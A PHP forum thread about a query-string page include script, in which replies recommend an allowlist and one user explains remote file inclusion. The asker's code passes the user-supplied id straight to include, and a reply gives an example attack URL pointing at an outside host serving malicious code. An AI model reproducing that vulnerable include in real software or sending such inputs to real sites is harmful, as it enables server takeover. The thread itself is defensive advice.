I have a simple PHP navigation script that works fine (index.php?id=blah)

I just made a subfolder called 'login' in my root directory to organize my news system files.

How do I use the php navigation system to access these files now that they're in the subfolder?

Currently this is what it is:

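<?php
// Requested page id from the query string; empty when none is given.
$page = isset($_GET['id']) ? $_GET['id'] : '';

if ($page == '') {
    // No id: show the default page.
    include 'news/main.php';
} else {
    // The id is used directly as a file name, with '.php' appended.
    if (isset($_GET['id']) && file_exists($_GET['id'].'.php')) {
        include $_GET['id'].'.php';
    } else {
        echo "<h2>The page you have requested does not exist on the server.</h2>";
    }
}
?>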

I tried using http://mysite.com/index.php?id=login/news.php but that didn't work.

Thank you

    Well, you have a few options:

    Include an array of allowed pages:

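    $pages = array('index' => 'index.php', 'login' => 'login/login.php');
    // Match the requested id against the array keys; only the mapped files can be included.
    if (isset($_GET['id']) && is_string($_GET['id']) && array_key_exists($_GET['id'], $pages)) {
        include($pages[$_GET['id']]);
    }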
    

    which would be called as navigation.php?id=index and navigation.php?id=login

    Or you could switch to a more versatile system of managing pages than using an include() based on a get variable, if your site is going to get big enough to require breaking it into directories.

    There's more, of course, but those are the two I can think of offhand when I'm tired. The first would probably be easiest if you only have a few pages, but you may want to consider a more robust rewrite/design of how you handle this.

      There is a serious flaw in using file_exists($_GET[id].'.php') to check if the file can be included. As the manual says, since PHP 5.0.0 this function works with some URL wrappers. So let's imagine someone tricks your script to include his malicious code:

      navigation.php?id=http://othersite.com/virus

      http://othersite.com/virus.php can be prepared to serve some code that will infect your server. And I know it's possible because some years ago I was the subject of such an attack.

        wilku wrote:

        There is a serious flaw in using file_exists($_GET[id].'.php') to check if the file can be included. As the manual says, since PHP 5.0.0 this function works with some URL wrappers. So let's imagine someone tricks your script to include his malicious code:

        navigation.php?id=http://othersite.com/virus

        http://othersite.com/virus.php can be prepared to serve some code that will infect your server. And I know it's possible because some years ago I was the subject of such an attack.

        Another good reason to implement the array of whitelisted pages, if it's not too large a site, or implement a different, more robust management scheme if it's too large.
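
An added example, not part of the original thread: the allowlist approach from the replies above, extended to cover the original question about files in the login subfolder. The function name resolve_page() and the 'main' and 'news' map entries are assumptions made for illustration; the sample inputs are constructed.

```php
<?php
/**
 * Map a request id to a file path, or return null if the id is not allowlisted.
 * The user-supplied value is only ever used as an array key; it never reaches
 * include or file_exists(), so a URL in ?id= is simply an unknown key.
 */
function resolve_page($id, array $pages, $default = 'main')
{
    if ($id === null || $id === '') {
        $id = $default;
    }
    // ?id[]=x arrives as an array; reject anything that is not a plain string.
    if (!is_string($id) || !array_key_exists($id, $pages)) {
        return null;
    }
    return $pages[$id];
}

// id => path relative to this script. Subfolders live in the map, not in the URL.
$pages = array(
    'main'  => 'news/main.php',
    'login' => 'login/login.php',
    'news'  => 'login/news.php',   // hypothetical entry for the file from the question
);

// Constructed sample inputs: no id, a mapped id, the URL the asker tried,
// the remote URL quoted in the reply above, and an array-valued id.
$samples = array(null, 'news', 'login/news.php', 'http://othersite.com/virus', array('news'));
foreach ($samples as $sample) {
    $target = resolve_page($sample, $pages);
    printf("%-32s => %s\n",
        json_encode($sample, JSON_UNESCAPED_SLASHES),
        $target === null ? '404' : $target);
}

// In index.php the same function would drive the include:
//   $target = resolve_page(isset($_GET['id']) ? $_GET['id'] : null, $pages);
//   if ($target !== null && is_file(__DIR__ . '/' . $target)) {
//       include __DIR__ . '/' . $target;
//   } else {
//       http_response_code(404);
//       echo "<h2>The page you have requested does not exist on the server.</h2>";
//   }
```

With this map the news page is requested as index.php?id=news; both login/news.php and the remote URL resolve to 404 because neither is a key in $pages.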
